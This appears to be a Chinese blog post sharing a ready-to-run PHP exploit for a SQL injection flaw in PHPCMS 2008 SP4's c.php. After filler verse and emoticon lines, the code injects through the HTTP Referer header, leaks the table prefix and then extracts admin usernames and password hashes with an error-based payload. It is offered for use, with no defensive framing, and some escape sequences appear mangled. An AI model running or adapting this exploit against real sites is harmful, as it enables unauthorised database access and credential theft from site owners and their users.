phpcms2008 最新注入 exp

摘要

春雨绵绵 无心睡眠 唔阅周章 五指一算 唔命不久矣。        十年苦读寒窗，终究成何物。

春雨绵绵 无心睡眠 唔阅周章 五指一算 唔命不久矣。

        十年苦读寒窗，终究成何物。

文采不行。该学习吹bb看论语才行。。。。。。。。。。。。。。

                    囧。。。。。。。。。。。。。。。

囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。

囧。。。。。。。。。。。。。。。

囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。

囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。

<?php  print_r ( " +---------------------------------------+ title:phpcms2008 sp4 c.php exploit mail:[email protected] blog:www.moonhack.org bbs:www.xinyues.org data:2013.3.28  +---------------------------------------+/n " ); if ($argc < 2) { print_r ( " +---------------------------------------+ target: php $argv[0] www.target.com  php $argv[0] www.target.com /phpcms2008/ +---------------------------------------+/n " ); exit (); } error_reporting ( E_ALL ); ini_set ( 'max_execution_time', '0' ); function send_http($host, $prot, $referer) {  $data = "";  $fp = @fsockopen ( $host, $prot, $errno, $errstr, 30 );  if (! $fp) {   exit ( "$host Connection failed" );  } else {      fwrite ( $fp, $referer );   while ( ! feof ( $fp ) ) {    $data .= fgets ( $fp, 128 );   }   fclose ( $fp );   return $data;  }  } $host = $argv [1]; $prot = "80"; $patch = isset ( $argv [2] ) ? $argv [2] : ""; $sql = "fuck'";  $prefix = http ( $host, $prot, $sql, $patch ); function http($host, $prot, $sql, $patch) {  $preg = '/INSERT INTO `(.*)ads_/';  $prefix = '';  $referer = "GET /$patch" . "c.php?id=1 HTTP/1.1/r/n";  $referer .= "Host: $host/r/n";  $referer .= "REFERER: $sql/r/n";  $referer .= "Connection: Close/r/n/r/n";  $data = send_http ( $host, $prot, $referer );  $data ;  preg_match ( $preg, $data, $prefix );  if (! $prefix) {  exit ( "fail/r/n" );  }  print ("prefix:$prefix[1]") ;  return $prefix [1]; }  $exp = http2 ( $host, $prot, $patch, $prefix ); function http2($host, $prot, $patch, $prefix) {  $preg = '//'~/'(.*):(.*)/'~1/'/';  $sql2 = $sqlstring = "fuck'),('a','123','123','123',(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from " . $prefix . "member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a))#";  $referer = "GET /$patch" . "c.php?id=1 HTTP/1.1/r/n";  $referer .= "Host: $host/r/n";  $referer .= "REFERER: $sql2/r/n";  $referer .= "Connection: Close/r/n/r/n";  $data = send_http ( $host, $prot, $referer );  preg_match ( $preg, $data, $exp );  if (! $exp) {   exit ( "fail/r/n" );  }  return $exp; } print_r ( " success:$host username:$exp[1] password:$exp[2] " ); ?>